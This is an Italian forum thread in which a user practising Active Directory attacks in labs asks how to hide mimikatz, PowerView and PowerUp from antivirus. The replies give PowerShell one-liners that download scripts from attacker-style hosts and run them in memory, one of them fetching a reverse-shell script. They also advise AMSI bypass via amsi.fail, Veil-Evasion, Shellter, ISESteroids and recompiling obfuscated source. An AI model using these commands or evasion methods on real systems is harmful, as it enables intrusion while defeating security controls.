Domanda Active Directory

[Oriol666]

Buonasera a tutti,

Sto facendo diverse prove per migliorare le mie skills nella AD sia usando lab tryhackme o creandomene uno da solo. Volevo chiedere una cosa. C'è un modo per "masherare" tool come Powerview o mimikatz o PowerUp in modo tale che AV non rilevi nulla?
Il bypassing AMSI quando questi tool vengono avviati l'ho risolto ma il problema resta se ad esempio da Github faccio un clone di questi tool sul locale che subito AV me li vede come malware.

Grazie in anticipo

 

[0xbro]

Buonasera a tutti,

Sto facendo diverse prove per migliorare le mie skills nella AD sia usando lab tryhackme o creandomene uno da solo. Volevo chiedere una cosa. C'è un modo per "masherare" tool come Powerview o mimikatz o PowerUp in modo tale che AV non rilevi nulla?
Il bypassing AMSI quando questi tool vengono avviati l'ho risolto ma il problema resta se ad esempio da Github faccio un clone di questi tool sul locale che subito AV me li vede come malware.

Grazie in anticipo

Una tecnica per gli script powershell è quella di eseguirli senza salvarli su disco tramite la funzione iex, quindi facendo qual cosa del tipo

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Per i binari puoi provare a usare veilevasion oppure shellter per provare a ingannare il riconoscimento tramite signature.
Per offuscare gli script powershell puoi usare anche ISESteroids, io l'ho usato per bypassare i controlli di un EDR e far girare mimikatz

 

[Baud]

Per i tool binari open source io preferisco ricompilare il programma dopo aver offuscato il sorgente e aver cambiato il codice in un paio di punti a caso, l'eseguibile in output non corrispondera' piu' alla signature di Defender e se non sono presenti programmi che analizzano il comportamento del processo passera' l'analisi senza problemi.

 

[Dock01]

Buonasera a tutti,

Sto facendo diverse prove per migliorare le mie skills nella AD sia usando lab tryhackme o creandomene uno da solo. Volevo chiedere una cosa. C'è un modo per "masherare" tool come Powerview o mimikatz o PowerUp in modo tale che AV non rilevi nulla?
Il bypassing AMSI quando questi tool vengono avviati l'ho risolto ma il problema resta se ad esempio da Github faccio un clone di questi tool sul locale che subito AV me li vede come malware.

Grazie in anticipo

CIao,
Devi prima corrompere amsi (amsi.fail), poi scarichi il tuo script.
Per windows defender è abbastanza, ovviamente dipende che tipo (se c'è) di EDR hai sotto / Antivirus.